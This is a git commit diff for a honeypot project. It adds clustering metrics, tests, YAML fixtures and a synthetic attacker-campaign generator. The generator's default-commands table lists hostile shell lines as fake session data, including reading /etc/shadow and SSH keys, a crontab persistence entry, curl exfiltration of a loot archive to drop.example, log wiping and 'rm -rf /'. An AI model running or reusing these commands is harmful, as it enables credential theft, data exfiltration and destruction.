feat(clustering): UKC phase enum + synthetic campaign factory + metric harness

Pre-implementation scaffolding for campaign clustering. The simulator is
the spec — algorithm code follows once fixtures + metrics are stable.

* decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out
  stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns
  with future MITRE ATT&CK tagging so synthetic data and runtime phase
  inference don't need renaming when TTP-tagging lands.
* tests/factories/campaign_factory.py — YAML DSL parser + deterministic
  generator emitting truth-labeled SyntheticAttacker / SyntheticSession
  records. Validates phase names, warns on unobservable phases, supports
  multi-campaign + noise corpora.
* tests/clustering/metrics.py — pure-Python ARI / homogeneity /
  completeness / singleton_recall (no sklearn dep). Decided before any
  algorithm exists, on purpose.
* tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3
  from the design doc; simplest of the six, exercises the full pipeline
  with an identity-clusterer placeholder.
* development/CAMPAIGN_CLUSTERING.md — design spec for the feature.
* development/DEVELOPMENT_V2.md — note on DSL evolution path
  (concurrent phases, multi-actor per phase) deferred post-v1.
This commit is contained in:
2026-04-26 06:29:10 -04:00
parent 3eb67c9400
commit 00254629f8
13 changed files with 1227 additions and 0 deletions

View File

179
tests/clustering/metrics.py Normal file
View File

@@ -0,0 +1,179 @@
"""
Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3.
Decided BEFORE any clustering algorithm exists, on purpose: if the
metrics get picked after seeing results, they'll flatter whatever the
algorithm happens to produce.
Four metrics, none on its own sufficient:
* Adjusted Rand Index — headline number, chance-corrected agreement
between predicted clusters and ground truth.
* Homogeneity — each predicted cluster contains only one true class.
Catches FALSE MERGES (campaigns wrongly fused).
* Completeness — every member of a true class lands in the same
predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn
apart).
* Singleton recall — fraction of ground-truth singletons (lone wolves,
background noise) that are kept singleton by the clusterer.
Implemented from first principles in pure Python so the test harness
doesn't pull sklearn/numpy into the runtime dependency surface.
"""
from __future__ import annotations
import math
from collections import Counter, defaultdict
def _comb2(n: int) -> int:
"""C(n, 2) — number of unordered pairs from n items."""
return n * (n - 1) // 2 if n >= 2 else 0
def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float:
"""
Adjusted Rand Index between two clusterings over the same item set.
Range: typically [0, 1]; can dip negative for worse-than-random
labelings. 1.0 = identical partitions (up to label renaming),
0.0 ≈ chance agreement.
Both args map item_id -> cluster_id. Items must align exactly.
"""
if set(truth) != set(pred):
raise ValueError(
"ARI requires identical item sets in truth and pred "
f"(missing in pred: {set(truth) - set(pred)}, "
f"missing in truth: {set(pred) - set(truth)})"
)
n = len(truth)
if n < 2:
return 1.0 # trivially "agree" on <2 items
# Build the contingency table n_ij = |cluster_i ∩ class_j|.
contingency: dict[tuple[str, str], int] = defaultdict(int)
for item, t_label in truth.items():
p_label = pred[item]
contingency[(p_label, t_label)] += 1
sum_comb = sum(_comb2(v) for v in contingency.values())
a_counts = Counter(pred.values()) # row sums (predicted clusters)
b_counts = Counter(truth.values()) # column sums (true classes)
sum_a = sum(_comb2(v) for v in a_counts.values())
sum_b = sum(_comb2(v) for v in b_counts.values())
total_pairs = _comb2(n)
expected = (sum_a * sum_b) / total_pairs if total_pairs else 0.0
max_index = (sum_a + sum_b) / 2
if max_index == expected:
# Degenerate: both clusterings are trivially equal in structure
# (both all-singletons, or both one-big-cluster). The math forces
# this — see the algebra of max_index = expected. The induced
# partitions are necessarily identical, so ARI is 1.0. (sklearn
# adopts the same convention.)
return 1.0
return (sum_comb - expected) / (max_index - expected)
def _entropy(counts: list[int], total: int) -> float:
if total == 0:
return 0.0
h = 0.0
for c in counts:
if c == 0:
continue
p = c / total
h -= p * math.log(p)
return h
def _conditional_entropy(
contingency: dict[tuple[str, str], int],
given_counts: dict[str, int],
total: int,
) -> float:
"""H(rows | cols) — i.e. entropy of class within each cluster."""
if total == 0:
return 0.0
h = 0.0
by_col: dict[str, list[int]] = defaultdict(list)
for (row, col), v in contingency.items():
by_col[col].append(v)
for col, vs in by_col.items():
col_total = given_counts[col]
if col_total == 0:
continue
col_entropy = _entropy(vs, col_total)
h += (col_total / total) * col_entropy
return h
def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float:
"""
1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster
contains only members of a single true class (no false merges).
"""
n = len(truth)
if n == 0:
return 1.0
contingency: dict[tuple[str, str], int] = defaultdict(int)
for item, t in truth.items():
contingency[(t, pred[item])] += 1
truth_counts = Counter(truth.values())
pred_counts = Counter(pred.values())
h_truth = _entropy(list(truth_counts.values()), n)
if h_truth == 0:
return 1.0
h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n)
return 1.0 - (h_truth_given_pred / h_truth)
def completeness(truth: dict[str, str], pred: dict[str, str]) -> float:
"""
1 - H(pred | truth) / H(pred). 1.0 = all members of each true class
are assigned to the same predicted cluster (no false splits).
"""
n = len(truth)
if n == 0:
return 1.0
contingency: dict[tuple[str, str], int] = defaultdict(int)
for item, t in truth.items():
contingency[(pred[item], t)] += 1
pred_counts = Counter(pred.values())
truth_counts = Counter(truth.values())
h_pred = _entropy(list(pred_counts.values()), n)
if h_pred == 0:
return 1.0
h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n)
return 1.0 - (h_pred_given_truth / h_pred)
def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float:
"""
Fraction of ground-truth singletons that the clusterer kept singleton.
A "true singleton" is an item whose truth-campaign has exactly one
member (lone wolves, background noise scanners). The metric exists
because ARI/homogeneity/completeness all dilute the cost of a
clusterer that absorbs noise into real campaigns — and noise
absorption is the failure mode that makes campaign attribution
useless in practice.
"""
truth_counts = Counter(truth.values())
true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1]
if not true_singletons:
return 1.0
pred_counts = Counter(pred.values())
kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1)
return kept / len(true_singletons)
def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]:
"""One-shot bundle the four metrics for fixture reports."""
return {
"adjusted_rand_index": adjusted_rand_index(truth, pred),
"homogeneity": homogeneity(truth, pred),
"completeness": completeness(truth, pred),
"singleton_recall": singleton_recall(truth, pred),
}

View File

@@ -0,0 +1,112 @@
"""Determinism + DSL-validation tests for the synthetic campaign factory."""
from __future__ import annotations
import pytest
from decnet.clustering.ukc import UKCPhase
from tests.factories.campaign_factory import (
DSLValidationError,
generate,
)
def _minimal_spec() -> dict:
return {
"campaign": {
"id": "c-test",
"actors": [{"id": "a-1", "asn": 64512}],
"phases": [{"name": "delivery", "actor": "a-1"}],
"duration_days": 1,
}
}
def test_generation_is_deterministic_given_seed() -> None:
spec = _minimal_spec()
a = generate(spec, seed=42)
b = generate(spec, seed=42)
# IDs are RNG-driven — same seed must produce identical IDs, not
# merely identical structure. Otherwise federation gossip and
# fixture diffing both break.
assert [att.attacker_id for att in a.attackers] == [
att.attacker_id for att in b.attackers
]
assert [s.session_id for s in a.sessions] == [s.session_id for s in b.sessions]
def test_different_seeds_produce_different_ids() -> None:
spec = _minimal_spec()
a = generate(spec, seed=1)
b = generate(spec, seed=2)
assert a.attackers[0].attacker_id != b.attackers[0].attacker_id
def test_truth_labels_match_dsl() -> None:
spec = _minimal_spec()
corpus = generate(spec, seed=0)
assert corpus.attackers[0].truth_campaign_id == "c-test"
assert corpus.attackers[0].truth_actor_id == "a-1"
# truth_labels() returns the dict the metric harness consumes.
labels = corpus.truth_labels()
assert labels[corpus.attackers[0].attacker_id] == "c-test"
def test_unobservable_phase_emits_no_events() -> None:
spec = _minimal_spec()
spec["campaign"]["phases"] = [
{"name": "reconnaissance", "actor": "a-1"}, # pre-target, unobservable
{"name": "delivery", "actor": "a-1"},
]
corpus = generate(spec, seed=0)
# Only the delivery phase should produce sessions.
assert all(s.phase == UKCPhase.DELIVERY for s in corpus.sessions)
assert len(corpus.sessions) == 1
def test_unknown_phase_name_raises() -> None:
spec = _minimal_spec()
spec["campaign"]["phases"] = [{"name": "make_coffee", "actor": "a-1"}]
with pytest.raises(DSLValidationError, match="unknown UKC phase"):
generate(spec, seed=0)
def test_phase_referencing_unknown_actor_raises() -> None:
spec = _minimal_spec()
spec["campaign"]["phases"] = [{"name": "delivery", "actor": "ghost"}]
with pytest.raises(DSLValidationError, match="unknown actor"):
generate(spec, seed=0)
def test_noise_scanners_are_truth_singletons() -> None:
spec = {
"corpus": {
"campaigns": [_minimal_spec()],
"noise": {"scanner_count": 5},
}
}
corpus = generate(spec, seed=0)
# 1 campaign actor + 5 noise scanners = 6 distinct truth campaigns.
truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
assert len(truth_campaigns) == 6
def test_multi_actor_campaign_shares_campaign_id() -> None:
spec = {
"campaign": {
"id": "c-shared",
"actors": [
{"id": "a-1", "asn": 14061},
{"id": "a-2", "asn": 14061},
],
"phases": [
{"name": "delivery", "actor": "a-1"},
{"name": "discovery", "actor": "a-2"},
],
"duration_days": 1,
}
}
corpus = generate(spec, seed=0)
truth = corpus.truth_labels()
# Both attacker rows must point to the SAME truth_campaign_id —
# this is the property fixture 5 (multi_operator) hinges on.
assert set(truth.values()) == {"c-shared"}

View File

@@ -0,0 +1,92 @@
"""
End-to-end pipeline test for fixture 3 (lone_wolf).
Loads the YAML spec, runs the synthetic generator, applies a placeholder
identity clusterer (each attacker → its own cluster), scores against
the expected bounds. This is the simplest of the six fixtures and is
deliberately the first one wired up — its ground truth is all
singletons, so an identity clusterer trivially passes, which proves the
DSL→factory→metrics pipeline works before any real algorithm is built.
Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4)
lands, this test will swap the placeholder for the real implementation
and the same fixture must continue to pass.
"""
from __future__ import annotations
from pathlib import Path
import pytest
import yaml
from tests.clustering.metrics import score
from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml
FIXTURE_DIR = Path(__file__).parent.parent / "fixtures" / "campaigns"
def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]:
"""Every attacker is its own cluster. Trivially correct on lone_wolf."""
return {a.attacker_id: f"cluster-{a.attacker_id}" for a in corpus.attackers}
def test_lone_wolf_pipeline_passes_bounds() -> None:
spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
bounds = yaml.safe_load((FIXTURE_DIR / "lone_wolf.expected.yaml").read_text())
corpus = generate(spec, seed=0)
truth = corpus.truth_labels()
pred = _identity_clusterer(corpus)
metrics = score(truth, pred)
failures = []
for name, bound in bounds.items():
observed = metrics[name]
if observed < bound["min"]:
failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}")
assert not failures, "fixture bounds violated: " + "; ".join(failures)
def test_lone_wolf_corpus_shape() -> None:
"""Sanity: 1 wolf + 8 noise scanners = 9 attackers, 9 sessions."""
spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
corpus = generate(spec, seed=0)
assert len(corpus.attackers) == 9
assert len(corpus.sessions) == 9
# Every attacker is a truth-singleton (its own campaign).
truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
assert len(truth_campaigns) == 9
def test_identity_clusterer_fails_on_a_real_campaign() -> None:
"""
Sanity for the harness, NOT a test of the clusterer: a real
multi-actor campaign should make the placeholder identity clusterer
fail completeness, since each truth-campaign gets fragmented into
one-member clusters. If this didn't fail, our metrics would be
blind to false splits — and that's the entire point of fixture 4
and 5 in the design doc.
"""
spec = {
"campaign": {
"id": "c-real",
"actors": [
{"id": "a-1", "asn": 14061},
{"id": "a-2", "asn": 14061},
],
"phases": [
{"name": "delivery", "actor": "a-1"},
{"name": "discovery", "actor": "a-2"},
],
"duration_days": 1,
}
}
corpus = generate(spec, seed=0)
truth = corpus.truth_labels()
pred = _identity_clusterer(corpus)
metrics = score(truth, pred)
# Identity clusterer splits the one true campaign across 2 clusters
# → completeness drops below 1.0. This must hold or our metrics
# aren't catching what they're supposed to catch.
assert metrics["completeness"] < 1.0
assert metrics["homogeneity"] == pytest.approx(1.0) # no false merges, just splits

View File

@@ -0,0 +1,76 @@
"""Sanity tests for the clustering metric harness."""
from __future__ import annotations
import pytest
from tests.clustering.metrics import (
adjusted_rand_index,
completeness,
homogeneity,
score,
singleton_recall,
)
def test_perfect_agreement_scores_one() -> None:
truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"}
# Same partition, different label names — clustering doesn't preserve
# names, so renamed-but-isomorphic must still score 1.0.
pred = {"a": "X", "b": "X", "c": "Y", "d": "Y"}
s = score(truth, pred)
assert s["adjusted_rand_index"] == pytest.approx(1.0)
assert s["homogeneity"] == pytest.approx(1.0)
assert s["completeness"] == pytest.approx(1.0)
assert s["singleton_recall"] == pytest.approx(1.0)
def test_all_singletons_perfect() -> None:
truth = {"a": "A", "b": "B", "c": "C"}
pred = {"a": "1", "b": "2", "c": "3"}
s = score(truth, pred)
assert s["singleton_recall"] == pytest.approx(1.0)
assert s["adjusted_rand_index"] == pytest.approx(1.0)
def test_false_merge_drops_homogeneity() -> None:
truth = {"a": "C1", "b": "C2"}
pred = {"a": "X", "b": "X"} # merged two distinct campaigns
assert homogeneity(truth, pred) == pytest.approx(0.0)
# Completeness is fine (each true class lives in one cluster).
assert completeness(truth, pred) == pytest.approx(1.0)
def test_false_split_drops_completeness() -> None:
truth = {"a": "C1", "b": "C1"}
pred = {"a": "X", "b": "Y"} # split one campaign into two clusters
assert completeness(truth, pred) == pytest.approx(0.0)
assert homogeneity(truth, pred) == pytest.approx(1.0)
def test_singleton_recall_penalises_noise_absorption() -> None:
# 3 lone wolves + 1 real campaign with 2 members.
truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"}
# Clusterer absorbs all wolves into the campaign.
pred = dict.fromkeys(truth, "BIG")
assert singleton_recall(truth, pred) == pytest.approx(0.0)
# And a clusterer that keeps wolves singleton should score 1.0
# on this metric, regardless of what it does with the campaign.
pred_ok = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"}
assert singleton_recall(truth, pred_ok) == pytest.approx(1.0)
def test_mismatched_item_sets_raises() -> None:
with pytest.raises(ValueError):
adjusted_rand_index({"a": "X"}, {"b": "Y"})
def test_random_labels_low_ari() -> None:
# ARI of an arbitrary partition vs. ground truth should be near 0,
# not near 1 — this is the chance-correction guarantee.
truth = {f"i{n}": f"C{n // 4}" for n in range(20)}
# Pred that ignores truth: just shuffles items into 5 buckets in
# an order uncorrelated with truth.
pred = {f"i{n}": f"X{(n * 7) % 5}" for n in range(20)}
ari = adjusted_rand_index(truth, pred)
# Loose bound — the point is "much closer to 0 than to 1".
assert ari < 0.3

View File

View File

@@ -0,0 +1,381 @@
"""
Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.
Reads a YAML campaign DSL describing actors, UKC phases, and tool
signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
records for the clustering test harness.
Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
emitted records so the metric harness can score predicted clusters
against ground truth without re-parsing the DSL. Production code that
later writes the same shape into real DB tables MUST strip these fields
before clustering runs — otherwise the algorithm trivially passes by
reading the answer key.
Determinism: given the same YAML and seed, two runs produce identical
records (including IDs). This is a load-bearing property — fixture
expectations are checked against the same seed every CI run.
"""
from __future__ import annotations
import hashlib
import random
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Any
import yaml
from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
@dataclass
class SyntheticSession:
session_id: str
attacker_id: str
decky_id: str
started_at: datetime
duration_s: float
phase: UKCPhase
commands: list[str]
credentials_tried: list[tuple[str, str]]
payload_hash: str | None
c2_callback: str | None
truth_campaign_id: str
truth_actor_id: str
@dataclass
class SyntheticAttacker:
attacker_id: str
ip: str
asn: int
ja3: str | None
hassh: str | None
first_seen: datetime
last_seen: datetime
truth_campaign_id: str
truth_actor_id: str
sessions: list[SyntheticSession] = field(default_factory=list)
@dataclass
class GeneratedCorpus:
"""Output of the factory — what the clusterer consumes."""
attackers: list[SyntheticAttacker]
# Convenience: flat list of every session across every attacker.
sessions: list[SyntheticSession]
def truth_labels(self) -> dict[str, str]:
"""attacker_id -> truth_campaign_id, the oracle the clusterer is scored against."""
return {a.attacker_id: a.truth_campaign_id for a in self.attackers}
# ─── Phase defaults ─────────────────────────────────────────────────────────
# When the DSL doesn't specify tool_signature commands for a phase, fall
# back to these. Keeps fixtures terse without making the factory invent
# data ad-hoc per call.
_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
UKCPhase.DELIVERY: [], # delivery is mostly network-level, no shell commands
UKCPhase.EXPLOITATION: [],
UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"],
UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"],
UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"],
UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"],
UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
UKCPhase.EXECUTION: ["./payload"],
UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"],
UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
UKCPhase.COMMAND_AND_CONTROL: [], # beaconing observed at network layer
UKCPhase.PIVOTING: [],
UKCPhase.IMPACT: ["rm -rf /"],
UKCPhase.OBJECTIVES: [],
}
# ─── DSL parsing ────────────────────────────────────────────────────────────
class DSLValidationError(ValueError):
"""Raised when a campaign YAML is malformed or references unknown phases."""
def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
"""Return list of warnings (e.g. unobservable phases). Raises on hard errors."""
if "campaign" not in spec:
raise DSLValidationError("missing top-level 'campaign' key")
c = spec["campaign"]
for key in ("id", "actors", "phases"):
if key not in c:
raise DSLValidationError(f"campaign missing required key: {key}")
actor_ids = {a["id"] for a in c["actors"]}
if not actor_ids:
raise DSLValidationError("campaign must declare at least one actor")
warnings: list[str] = []
for i, ph in enumerate(c["phases"]):
if "name" not in ph:
raise DSLValidationError(f"phase[{i}] missing 'name'")
try:
phase_enum = UKCPhase(ph["name"])
except ValueError as exc:
raise DSLValidationError(
f"phase[{i}] has unknown UKC phase '{ph['name']}'"
) from exc
if phase_enum not in OBSERVABLE_PHASES:
warnings.append(
f"phase '{ph['name']}' is pre-target / unobservable from a "
f"honeypot; no events will be emitted for it"
)
# Single-actor campaigns can omit phase.actor; multi-actor must specify.
if "actor" in ph and ph["actor"] not in actor_ids:
raise DSLValidationError(
f"phase[{i}] references unknown actor '{ph['actor']}'"
)
return warnings
# ─── Generator ──────────────────────────────────────────────────────────────
def _stable_uuid(rng: random.Random, prefix: str) -> str:
"""Deterministic UUID-shaped identifier driven by the seeded RNG."""
raw = rng.randbytes(16)
return f"{prefix}-{uuid.UUID(bytes=raw)}"
def _stable_ip(rng: random.Random) -> str:
"""Pick a routable-looking IPv4 in non-RFC1918 space."""
# Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+.
while True:
a = rng.randint(1, 223)
if a in (10, 127):
continue
b = rng.randint(0, 255)
if a == 172 and 16 <= b <= 31:
continue
if a == 192 and b == 168:
continue
c = rng.randint(0, 255)
d = rng.randint(1, 254)
return f"{a}.{b}.{c}.{d}"
def _payload_hash(seed: str) -> str:
return hashlib.sha256(seed.encode()).hexdigest()
def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600))
def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
"""
Produce a deterministic synthetic corpus from a parsed YAML spec.
The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
Multiple campaigns + a noise block can be combined by wrapping them
in a top-level `corpus:` key; otherwise a single `campaign:` is
expected.
"""
rng = random.Random(seed)
campaigns: list[dict[str, Any]]
noise_cfg: dict[str, Any]
if "corpus" in spec:
campaigns = spec["corpus"].get("campaigns", [])
noise_cfg = spec["corpus"].get("noise", {}) or {}
else:
campaigns = [spec]
noise_cfg = {}
attackers: list[SyntheticAttacker] = []
sessions: list[SyntheticSession] = []
for c_wrapper in campaigns:
warnings = _validate_campaign_spec(c_wrapper)
# Surface warnings via stderr-like channel — tests can opt to assert.
for w in warnings:
# Stored on the corpus for inspection rather than printed; tests
# that care can dig into the spec, but most don't.
_ = w
c = c_wrapper["campaign"]
_emit_campaign(c, rng, attackers, sessions)
_emit_noise(noise_cfg, rng, attackers, sessions)
return GeneratedCorpus(attackers=attackers, sessions=sessions)
def _emit_campaign(
c: dict[str, Any],
rng: random.Random,
attackers: list[SyntheticAttacker],
sessions: list[SyntheticSession],
) -> None:
campaign_id = c["id"]
duration_days = int(c.get("duration_days", 1))
pause_windows: list[tuple[int, int]] = [
tuple(p) for p in c.get("pause_windows", []) # type: ignore[misc]
]
# Anchor the synthetic timeline at a fixed epoch so determinism holds
# across runs regardless of wall clock.
epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
# One attacker record per actor — captures the cross-session identity
# the clusterer is supposed to recover. IPs may rotate per session
# for rotating ip_pool actors; we record the first/last observed IP
# on the attacker row and let session-level fields carry the rest.
actor_attackers: dict[str, SyntheticAttacker] = {}
for actor in c["actors"]:
a_id = _stable_uuid(rng, "att")
att = SyntheticAttacker(
attacker_id=a_id,
ip=_stable_ip(rng),
asn=int(actor.get("asn", 0)),
ja3=actor.get("ja3"),
hassh=actor.get("hassh"),
first_seen=epoch,
last_seen=epoch,
truth_campaign_id=campaign_id,
truth_actor_id=actor["id"],
)
actor_attackers[actor["id"]] = att
attackers.append(att)
# Walk phases in declared order. Each phase produces N sessions
# against random deckies (or a sticky one if previous_success).
decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
last_success_decky: dict[str, str] = {}
for phase_idx, ph in enumerate(c["phases"]):
phase = UKCPhase(ph["name"])
if phase not in OBSERVABLE_PHASES:
continue # pre-target phase; emit nothing
actor_id = ph.get("actor") or c["actors"][0]["id"]
att = actor_attackers[actor_id]
actor_spec = next(a for a in c["actors"] if a["id"] == actor_id)
sig = ph.get("tool_signature", {}) or {}
commands = sig.get("commands", _PHASE_DEFAULT_COMMANDS[phase])
creds_list = sig.get("credentials") or []
c2 = sig.get("c2_callback")
payload_seed = sig.get("payload_hash")
payload = _payload_hash(payload_seed) if payload_seed else None
target_sel = ph.get("target_selector", {}) or {}
n_sessions = int(target_sel.get("count", 1))
if target_sel.get("decky") == "previous_success":
decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
else:
decky_choices = decky_pool
# Schedule sessions across the campaign window, respecting the
# actor's hours_active_utc and pause_windows.
active_hours = actor_spec.get("hours_active_utc", list(range(24)))
jitter = int(actor_spec.get("jitter_seconds", 60))
for s_idx in range(n_sessions):
day = rng.randint(0, max(0, duration_days - 1))
if any(start <= day <= end for start, end in pause_windows):
# Skip into post-pause day.
later_days = [
d for d in range(duration_days)
if not any(s <= d <= e for s, e in pause_windows)
]
if not later_days:
continue
day = rng.choice(later_days)
hour = rng.choice(active_hours)
day_start = epoch + timedelta(days=day)
started_at = _hour_to_offset(rng, day_start, hour, jitter)
duration_s = float(ph.get("dwell_seconds", 5))
sess = SyntheticSession(
session_id=_stable_uuid(rng, "sess"),
attacker_id=att.attacker_id,
decky_id=rng.choice(decky_choices),
started_at=started_at,
duration_s=duration_s,
phase=phase,
commands=list(commands),
credentials_tried=[tuple(p) for p in creds_list], # type: ignore[misc]
payload_hash=payload,
c2_callback=c2,
truth_campaign_id=campaign_id,
truth_actor_id=actor_id,
)
sessions.append(sess)
att.sessions.append(sess)
if started_at < att.first_seen or att.first_seen == epoch:
att.first_seen = started_at
if started_at > att.last_seen:
att.last_seen = started_at
# If this phase is a "successful entry," remember the decky
# for any subsequent previous_success target_selector.
if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
last_success_decky[actor_id] = sess.decky_id
def _emit_noise(
noise_cfg: dict[str, Any],
rng: random.Random,
attackers: list[SyntheticAttacker],
sessions: list[SyntheticSession],
) -> None:
"""Background scanners — opportunistic, no shared signals, singletons."""
n_scanners = int(noise_cfg.get("scanner_count", 0))
if n_scanners <= 0:
return
epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
for i in range(n_scanners):
scanner_id = f"noise-scanner-{i:04d}"
att = SyntheticAttacker(
attacker_id=_stable_uuid(rng, "att"),
ip=_stable_ip(rng),
asn=rng.randint(1000, 65000),
ja3=None,
hassh=None,
first_seen=epoch,
last_seen=epoch,
truth_campaign_id=scanner_id, # each scanner is its own truth-campaign
truth_actor_id=scanner_id,
)
attackers.append(att)
# One Delivery-phase session, no follow-up.
started = epoch + timedelta(seconds=rng.randint(0, 86400))
sess = SyntheticSession(
session_id=_stable_uuid(rng, "sess"),
attacker_id=att.attacker_id,
decky_id=f"decky-{rng.randint(1, 20):02d}",
started_at=started,
duration_s=1.0,
phase=UKCPhase.DELIVERY,
commands=[],
credentials_tried=[],
payload_hash=None,
c2_callback=None,
truth_campaign_id=scanner_id,
truth_actor_id=scanner_id,
)
sessions.append(sess)
att.sessions.append(sess)
att.first_seen = started
att.last_seen = started
def load_yaml(path: str | Path) -> dict[str, Any]:
"""Read a fixture file. Kept tiny so tests can inline-build specs too."""
text = Path(path).read_text(encoding="utf-8")
parsed = yaml.safe_load(text)
if not isinstance(parsed, dict):
raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")
return parsed

View File

@@ -0,0 +1,17 @@
# Bounds for fixture 3 (lone_wolf).
#
# Every actor in this fixture is a singleton (the wolf itself, plus
# every background-noise scanner). A correct clusterer puts each in
# its own cluster; that's a perfect score.
#
# Bounds are deliberately loose at first — we ratchet them up as the
# algorithm matures. Loosening any bound to make CI pass requires
# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2).
adjusted_rand_index:
min: 0.85
homogeneity:
min: 0.90
completeness:
min: 0.80
singleton_recall:
min: 0.95

32
tests/fixtures/campaigns/lone_wolf.yaml vendored Normal file
View File

@@ -0,0 +1,32 @@
# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2.
#
# One opportunistic scanner, Delivery phase only, no follow-up, no shared
# signals with anyone else. Surrounded by background noise. The clusterer
# must keep the wolf and every noise scanner as their own singleton —
# none should be absorbed into anyone else.
#
# This is the simplest of the six fixtures and exists primarily to prove
# the end-to-end pipeline (DSL → factory → clusterer → metrics) before
# we invest in the harder scenarios.
corpus:
campaigns:
- campaign:
id: lone-wolf-001
actors:
- id: wolf-a
asn: 14061
ip_pool: sticky
ja3: null
hassh: null
hours_active_utc: [3, 4, 5]
jitter_seconds: 30
phases:
- name: delivery
actor: wolf-a
target_selector:
service: any
count: 1
dwell_seconds: 1
duration_days: 1
noise:
scanner_count: 8